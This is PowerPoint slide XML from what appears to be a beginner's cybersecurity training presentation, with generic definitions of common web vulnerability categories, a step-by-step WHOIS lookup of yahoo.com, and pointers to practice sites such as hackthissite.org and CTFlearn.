        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BDB05B6-B266-CDDC-0F83-43521D6C5356}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2124075" y="3644900"/>
            <a:ext cx="3514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5675"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4825"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>Security misconfiguration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31748" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{543656AB-6947-6E8C-1241-DAC178D255CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="4794250"/>
            <a:ext cx="5953125"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4825"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Security misconfiguration is a type of security vulnerability that occurs when a web application is not configured correctly. Security misconfiguration can be caused by weak passwords, unsecured network protocols, or failure to follow best practices for secure configuration. Security misconfiguration can lead to data breaches, identity theft, and other types of cyber attacks. To prevent security misconfiguration, developers should follow secure configuration principles, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit security misconfiguration to steal sensitive data, modify or delete data, or take control of an application. Security misconfiguration can be prevented by using secure passwords, following best practices for secure configuration, and regularly updating software and security systems.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6CEA1E25-A302-3363-F142-DB17C650F1BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="950913"/>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39700" indent="-139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263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="3363"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Whois redirects to new tab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5123" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20F1CC86-1F90-8F53-7226-00E12D9B45B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="1752600"/>
            <a:ext cx="3429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36525" indent="-139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363"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="3363"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Paste the domain name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5124" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA1D4BA9-A00A-E966-A451-4818705CB77B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="2743200"/>
            <a:ext cx="6705600"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36525" indent="-139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363"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>I got some information of that site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Domain Name: YAHOO.COM Registry Domain ID: 3643624_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.markmonitor.com Registrar URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.markmonitor.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t> Updated Date: 2023-02-03T18:07:10Z Creation Date: 1995-01-18T05:00:00Z Registry Expiry Date: 2024-01-19T05:00:00Z Registrar: MarkMonitor Inc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrar IANA ID: 292</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Registrar Abuse Contact Email: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>abusecomplaints@markmonitor.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t> Registrar Abuse Contact Phone: +1.2086851750 Domain Status: clientDeleteProhibited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://icann.org/epp#clientDeleteProhibited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t> Domain Status: clientTransferProhibited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://icann.org/epp#clientTransferProhibited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t> Domain Status: clientUpdateProhibited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://icann.org/epp#clientUpdateProhibited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t> Domain Status: serverDeleteProhibited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://icann.org/epp#serverDeleteProhibited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t> Domain Status: serverTransferProhibited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://icann.org/epp#serverTransferProhibited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t> Domain Status: serverUpdateProhibited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://icann.org/epp#serverUpdateProhibited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t> Name Server: NS1.YAHOO.COM</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11" name="arrow.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B6572019-4FE6-B0BD-6480-50E3E774D54E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1243013" y="1398588"/>
            <a:ext cx="52768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3988"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>Vulnerable and outdated Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEEC7223-7058-24DF-F792-B9B502D28306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="2365375"/>
            <a:ext cx="5949950"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3988"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3363"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Vulneable and outdated components are a type of security vulnerability that occurs when a web application uses outdated or insecure software components. Vulnerable and outdated components can be caused by failure to update software, use of deprecated software, or use of software with known vulnerabilities. Vulnerable and outdated components can lead to data breaches, identity theft, and other types of cyber attacks. To prevent vulnerable and outdated components, developers should use up-to-date software components, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit vulnerable and outdated components to steal sensitive data, modify or delete data, or take control of an application. Vulnerable and outdated components can be prevented by using up-to-date software components, following best practices for secure coding, and regularly updating software and security systems.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32772" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F60D64B-45A8-4C7C-695C-F6687226878B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1076325" y="7215188"/>
            <a:ext cx="56261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363"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4825"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>identification and authentication failures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32773" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A3C4045-6FB1-7987-2D49-5C0EB5E27BE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="901700" y="8362950"/>
            <a:ext cx="55181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50"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4825"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Identification and authentication failures are a type of security vulnerability that occurs when a web application fails to properly</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EA00B20F-9678-DFF5-8227-95DEBA7E0AE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="950913"/>
            <a:ext cx="5907088" cy="39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Aft>
                <a:spcPts val="5675"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>identify and authenticate users. Identification and authentication failures can be caused by weak passwords, lack of multi-factor authentication, or failure to follow best practices for secure identification and authentication. Identification and authentication failures can lead to data breaches, identity theft, and other types of cyber attacks. To prevent identification and authentication failures, developers should follow secure identification and authentication principles, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit identification and authentication failures to steal sensitive data, modify or delete data, or take control of an application. Identification and authentication failures can be prevented by using strong passwords, implementing multi-factor authentication, and following best practices for secure identification and authentication.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F594B0EC-632B-B592-A7AD-6F0B03248343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1460500" y="5927725"/>
            <a:ext cx="48545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5675"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4825"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>software and data integrity failures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33796" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B78CCDD1-E565-5DB4-B1D1-8C883AF53FEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="7077075"/>
            <a:ext cx="59594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4825"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Software and data integrity failures are a type of security vulnerability that occurs when a web application fails to maintain the integrity of its software and data. Software and data integrity failures can be caused by failure to follow best practices for secure software development, use of unsecured network protocols, or failure to implement secure coding practices. Software and data integrity failures can lead to data breaches, identity theft, and other types of</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10437CC0-954A-9613-5864-91E9A0CFBAF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="950913"/>
            <a:ext cx="5943600" cy="249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Aft>
                <a:spcPts val="3363"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>cyber attacks. To prevent software and data integrity failures, developers should follow secure software development principles, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit software and data integrity failures to steal sensitive data, modify or delete data, or take control of an application. Software and data integrity failures can be prevented by using secure software development practices, following best practices for secure coding, and regularly updating software and security systems.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1F56A5B-C4FB-9461-CC16-734052C716F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1146175" y="4087813"/>
            <a:ext cx="54768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363"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4825"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>Security logging and monitoring failures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34820" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CC669D5-4021-7450-8DA9-4F175703AE93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="5237163"/>
            <a:ext cx="5873750"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4825"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Security logging and monitoring failures are a type of security vulnerability that occurs when a web application fails to properly log and monitor security events. Security logging and monitoring failures can be caused by failure to implement secure logging and monitoring practices, use of unsecured network protocols, or failure to follow best practices for secure coding. Security logging and monitoring failures can lead to data breaches, identity theft, and other types of cyber attacks. To prevent security logging and monitoring failures, developers should follow secure logging and monitoring principles, implement secure coding practices, and regularly test their applications for vulnerabilities. Attackers can exploit security logging and monitoring failures to steal sensitive data, modify or delete data, or take control of an application. Security logging and monitoring</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01847EEF-FC3D-7284-79B3-8552EB183093}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="950913"/>
            <a:ext cx="55880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Aft>
                <a:spcPts val="6725"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>failures can be prevented by using secure logging and monitoring practices, following best practices for secure coding, and regularly updating software and security systems.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41A830B2-A3B0-2055-1CDD-97E407BCF849}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1951038" y="2968625"/>
            <a:ext cx="38798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6725"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3775"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>server - side request forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35844" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F5AB01-01E7-3716-FE94-4975DA442621}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="3935413"/>
            <a:ext cx="5862638"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3775"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Server-side request forgery (SSRF) is a type of security vulnerability that occurs when an attacker is able to send a request from a vulnerable web application to an external server. SSRF can be caused by failure to validate user input, use of unsecured network protocols, or failure to follow best practices for secure coding. SSRF can lead to data breaches, identity theft, and other types of cyber attacks. To prevent SSRF, developers should follow secure coding practices, implement secure network protocols, and regularly test their applications for vulnerabilities. Attackers can exploit SSRF to steal sensitive data, modify or delete data, or take control of an application. SSRF can be prevented by validating user input, using secure network protocols, and following best practices for secure coding.</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BA8C-15AB-CFAF-5B5E-3FC3BFFE96EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>THANKING YOU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C663AED-011A-3EA6-C605-825B59B4C03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15913686"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>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CBA937F2-ED5C-5951-16F0-8AEB7C72F207}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="666750" y="950913"/>
            <a:ext cx="6648450"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428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700"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Name Server: NS2.YAHOO.COM Name Server: NS3.YAHOO.COM Name Server: NS4.YAHOO.COM Name Server: NS5.YAHOO.COM DNSSEC: unsigned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>URL of the ICANN Whois Inaccuracy Complaint Form: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.icann.org/wicf/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="3150"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>&gt;&gt;&gt; Last update of whois database: 2023-07-23T23:59:03Z &lt;&lt;&lt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E803B2B-0600-99A6-9D72-7E7340EF61B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="2971800"/>
            <a:ext cx="664845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150"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1475"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>DAY-1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1475"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" b="1"/>
              <a:t>Task -2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3075"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Finding vulnerable sites </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3075"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2950"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>hackthissite.org </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2950"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2950"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Some sites will be shown In contents </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2950"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2950"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Vulnerable sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2950"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>&gt;    CTFlearn</a:t>
            </a:r>
          </a:p>
          <a:p>
